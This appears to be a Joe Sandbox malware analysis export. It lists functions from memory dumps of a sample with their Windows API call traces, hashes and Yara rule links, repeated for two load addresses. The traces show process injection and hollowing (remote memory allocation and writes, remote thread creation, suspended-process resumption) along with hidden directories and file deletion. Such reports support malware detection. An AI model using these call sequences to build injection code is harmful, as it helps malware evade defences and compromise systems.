Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
Instruction ID: bd24ae08cee234d69d512d34c1bc1e270448e30e104c56c6287d8b6f419b6be0
Opcode Fuzzy Hash: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
Instruction Fuzzy Hash: 6FF0F8B5900154DBEF02EF64C485A9A7BB8AF44305F4515C4AE4DFF20ACB30A6598F64

Non-executed Functions

Function 008B0E45 Relevance: 6.1, APIs: 4, Instructions: 57injectionmemorythreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(0000094C,00000000,008B59EC,00003000,00000040,?,?,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E6B
WriteProcessMemory.KERNEL32(0000094C,008B0024,00000000,008B59EC,00000000,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E89
IsWow64Process.KERNEL32(0000094C,?,?,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E9F
CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B0ED5

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction ID: 1d07042dd9484bc8a5124d3dcfb53530dd59f0a1757de902736fbec867726bf5
Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction Fuzzy Hash: 9E113D32100209BBFF205F15CC45F963B69EF80754F144411FE05FE195E771E561CAA8

Function 001D0E21 Relevance: 6.1, APIs: 4, Instructions: 57injectionmemorythreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(0000094C,00000000,001D59C8,00003000,00000040,?,?,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E47
WriteProcessMemory.KERNEL32(0000094C,001D0000,00000000,001D59C8,00000000,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E65
IsWow64Process.KERNEL32(0000094C,?,?,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E7B
CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D0EB1

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction ID: 15c529a3ddd503f89164435e89b95c21f57bb2a4f6bbbab16ab4c1d3f0f28629
Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction Fuzzy Hash: D6118C32200204FFFF215F24CC85FAA3B69EF84754F188451FE48BE695D770A560CAA8

Function 008B06AC Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(008B06A3,00000009,?,00000000), ref: 008B06B1

Part of subcall function 008B0D01: GetProcAddress.KERNEL32(00000000,008B04D5), ref: 008B0D0E

Part of subcall function 008B06F2: lstrcat.KERNEL32(00000000,008B06E9), ref: 008B0701
Part of subcall function 008B06F2: lstrcmpiA.KERNEL32(?,00000000), ref: 008B071B
Part of subcall function 008B06F2: Sleep.KERNEL32(00001388), ref: 008B072E
Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B074F
Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0761
Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B0782
Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0794
Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B07B5
Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B07C7
Part of subcall function 008B06F2: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 008B07DB
Part of subcall function 008B06F2: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 008B0822
Part of subcall function 008B06F2: Sleep.KERNEL32(00001388), ref: 008B0841

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 31d6e29edee83bdbeb72d0cddcee7ed6896cd4b70af18f67abcb15bb31fdd5c2
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction Fuzzy Hash: E1410EB24042149EDB126BA08C89FEA77ACFF44700F4505A9BB85EF156EE309680CFA5

Function 001D0688 Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001D067F,00000009,?,00000000), ref: 001D068D

Part of subcall function 001D0CDD: GetProcAddress.KERNEL32(00000000,001D04B1), ref: 001D0CEA

Part of subcall function 001D06CE: lstrcat.KERNEL32(00000000,001D06C5), ref: 001D06DD
Part of subcall function 001D06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001D06F7
Part of subcall function 001D06CE: Sleep.KERNEL32(00001388), ref: 001D070A
Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D072B
Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D073D
Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D075E
Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D0770
Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D0791
Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D07A3
Part of subcall function 001D06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001D07B7
Part of subcall function 001D06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001D07FE
Part of subcall function 001D06CE: Sleep.KERNEL32(00001388), ref: 001D081D

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 87f78207362c3635447f183b732f1d306dbece0f4372e1837fc003e5ae7ec5a2
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction Fuzzy Hash: 58410FB25002149FDB136B60CC89FAA77BCEF54700F45059ABB85EF155DF309680CEA5

Function 008B09A3 Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 008B09BE
RtlExitUserThread.NTDLL(00000000), ref: 008B09C6
OpenMutexA.KERNEL32(001F0001,00000000), ref: 008B09E6
GetStartupInfoA.KERNEL32(00000000), ref: 008B09FE

Part of subcall function 008B0A3E: CreateProcessA.KERNEL32(00000000,008B0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 008B0A45
Part of subcall function 008B0A3E: GetThreadContext.KERNEL32(?,00000000), ref: 008B0A6D
Part of subcall function 008B0A3E: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 008B0A98
Part of subcall function 008B0A3E: DuplicateHandle.KERNEL32(000000FF,000000FF,?,008B59EC,00000000,00000000,00000002), ref: 008B0ADD
Part of subcall function 008B0A3E: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 008B0B0B
Part of subcall function 008B0A3E: ResumeThread.KERNEL32(?), ref: 008B0B1B
Part of subcall function 008B0A3E: Sleep.KERNEL32(000003E8), ref: 008B0B2B
Part of subcall function 008B0A3E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 008B0B42

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction ID: b8e77915aaa469f9a7919645640e8e724e22a8445354bf0ba74d2d3ab9941029
Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction Fuzzy Hash: E4418271640214AFEF129F60CC85FAA77BCFF44744F040195BA49FE1E6DAB0AA90CE65

Function 008B06F2 Relevance: 18.1, APIs: 12, Instructions: 97
sleepstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,008B06E9), ref: 008B0701
lstrcmpiA.KERNEL32(?,00000000), ref: 008B071B
Sleep.KERNEL32(00001388), ref: 008B072E
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B074F
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0761
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B0782
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0794
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B07B5
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B07C7
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 008B07DB
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 008B0822
Sleep.KERNEL32(00001388), ref: 008B0841

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 7d9abece32e59deb2306f504579d92ba5951c4a9d881836de2c6511d15905aec
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: D131FFB25002149EDB166F608C89FEA77BCFF44B44F4504A9BB85EE145EE309680CEA9

Function 001D06CE Relevance: 18.1, APIs: 12, Instructions: 97
sleepstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,001D06C5), ref: 001D06DD
lstrcmpiA.KERNEL32(?,00000000), ref: 001D06F7
Sleep.KERNEL32(00001388), ref: 001D070A
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D072B
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D073D
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D075E
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D0770
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D0791
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D07A3
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001D07B7
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001D07FE
Sleep.KERNEL32(00001388), ref: 001D081D

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 06228663ed976dd27bc9ed4a265eda734156d84a2f2ddccc23b7d78c7540adac
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: AE310EB25002149FDF176BA0CC89FAA77BCEF54B00F4504AABB85EE155DF709680CEA5

Function 008B268A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsA.KERNEL32(008B267A,00000010,?,?,00000000,00000104), ref: 008B268F
lstrcat.KERNEL32(00000000,008B26C7), ref: 008B26D4
lstrcat.KERNEL32(00000000,00000000), ref: 008B26E7

Strings

\AC\, xrefs: 008B26A7

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: 8f8cd8044e04d822f7a8de21d8c7b892cbdafb4edec8f708b7e5ef8558ee6646
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 0721BC70100108EFEF129F60CC49BDEBBB4FF21704F2441A9E914EE2A1D7309A659B58

Function 001D2666 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsA.KERNEL32(001D2656,00000010,?,?,00000000,00000104), ref: 001D266B
lstrcat.KERNEL32(00000000,001D26A3), ref: 001D26B0
lstrcat.KERNEL32(00000000,00000000), ref: 001D26C3

Strings

\AC\, xrefs: 001D2683

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: ac260bf76c843a472e3623527236a47fa4163778177da073c7882fb977aa97b2
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 8B21B071500208EFEF129F60CC49B9DBBB4FF20704F1441AAED64EE2A1D7309A61DB54

Function 008B0A3E Relevance: 12.1, APIs: 8, Instructions: 76
threadsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,008B0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 008B0A45
GetThreadContext.KERNEL32(?,00000000), ref: 008B0A6D
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 008B0A98
DuplicateHandle.KERNEL32(000000FF,000000FF,?,008B59EC,00000000,00000000,00000002), ref: 008B0ADD
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 008B0B0B
ResumeThread.KERNEL32(?), ref: 008B0B1B
Sleep.KERNEL32(000003E8), ref: 008B0B2B
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 008B0B42

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: ea0af126f90ebd72fd56751bc6176ff4b7e4b59ba65c3c53e200b6aab19e39b2
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: 29314F316401149FEF228F14CC95BAA77B8FF04754F0805D4AA49FE1E5DBB0AA90CE64

Function 001D0A1A Relevance: 12.1, APIs: 8, Instructions: 76
threadsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,001D0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001D0A21
GetThreadContext.KERNEL32(?,00000000), ref: 001D0A49
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001D0A74
DuplicateHandle.KERNEL32(000000FF,000000FF,?,001D59C8,00000000,00000000,00000002), ref: 001D0AB9
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001D0AE7
ResumeThread.KERNEL32(?), ref: 001D0AF7
Sleep.KERNEL32(000003E8), ref: 001D0B07
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001D0B1E

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: ce19243c9b0df2c36d4bc763ab7a42923e633e507f13726d36402ffde9f12f03
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: 40314F716441549FEF238F20CC85FA977B8EF08744F080196AA49FE1E6DB709A90CE64

Function 008B0D4D Relevance: 12.1, APIs: 8, Instructions: 64sleepprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008B0D6C
Sleep.KERNEL32(000003E8), ref: 008B0D82
Process32First.KERNEL32(?,00000000), ref: 008B0DA2
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 008B0DD7
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 008B0DED
Process32Next.KERNEL32(?,?), ref: 008B0E03
CloseHandle.KERNEL32(?), ref: 008B0E2F
Sleep.KERNEL32(000003E8), ref: 008B0E3A

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction ID: 4b03f0403f47856689798158294f4987e455a1d52e719cb46278a43f5af75bb1
Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction Fuzzy Hash: 84216035901118ABEF225F54CC54AEEB7B9FF08701F0901D9F919EA2D1CA309E508F54

Function 001D0D29 Relevance: 12.1, APIs: 8, Instructions: 64
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D0D48
Sleep.KERNEL32(000003E8), ref: 001D0D5E
Process32First.KERNEL32(?,00000000), ref: 001D0D7E
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001D0DB3
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001D0DC9
Process32Next.KERNEL32(?,?), ref: 001D0DDF
CloseHandle.KERNEL32(?), ref: 001D0E0B
Sleep.KERNEL32(000003E8), ref: 001D0E16

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction ID: ee6ad697a178ae2bc881c5805d246c9a587973520cfdbe67655c646f3b3f64f8
Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction Fuzzy Hash: 9F218031901514ABEF235FA4CC54BE9B7BABF48700F0901EAF909FA295CB309E908F54

Function 008B2AAC Relevance: 7.6, APIs: 5, Instructions: 108filesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 008B2A84

Part of subcall function 008B2BDF: Sleep.KERNEL32(00002710), ref: 008B2C50

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 008B2B26
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 008B2B6A
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 008B2BC0
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 008B2BD4

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: 01aee93792beba932c4aef3f3956b1ca5969a1a7bb5a1bab1fe3d272e0f5e475
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: 7F313371500225AEDF226F708D49FEB77BCFF94704F400999B945EA142DE349690CEA6

Function 001D2A88 Relevance: 7.6, APIs: 5, Instructions: 108filesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 001D2A60

Part of subcall function 001D2BBB: Sleep.KERNEL32(00002710), ref: 001D2C2C

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001D2B02
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001D2B46
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001D2B9C
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001D2BB0

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: 61b954c1bd1fbd78b85a59315dca18815e24e1c638c8a45731d4a6c5ed37217e
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: 983135715002155EDB226F71CD89FAB77BCEFB0704F40049BEA55DA151DF749680CAA1

Function 008B32E6 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 008B330A
GetStartupInfoA.KERNEL32(00000000), ref: 008B3354
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,008B32D5,00000011,?,00000000,00A00000), ref: 008B3381
CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B338D
CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B3399

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction ID: 38133a0bfb964b64351e3cc04e4a6488f990d40f43ab3ee865591e2372c53d68
Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction Fuzzy Hash: D81133B24045549EEF126F64CC89AEF77FCFF50305F0144A9E985EA105DE349A80CE96

Function 001D32C2 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001D32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001D3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001D32B1,00000011,?,00000000,00A00000), ref: 001D335D
CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3369
CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3375

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction ID: ca119f87e6564d96ab8ed056a7c5a770e30a9494ccb9aa1ae5ea548ac38d7778
Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction Fuzzy Hash: 9B1163B2404514AEEF126B60CC85FAFB7FDEF50305F0144AAE995A6101DB345A80CFA2

Function 008B32B3 Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 008B330A
GetStartupInfoA.KERNEL32(00000000), ref: 008B3354
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,008B32D5,00000011,?,00000000,00A00000), ref: 008B3381
CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B338D
CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B3399

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
Instruction ID: 39f68ae7aed22e4cc231e6d60fb353ee287a41849d1e946453a2f6f2300169c4
Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
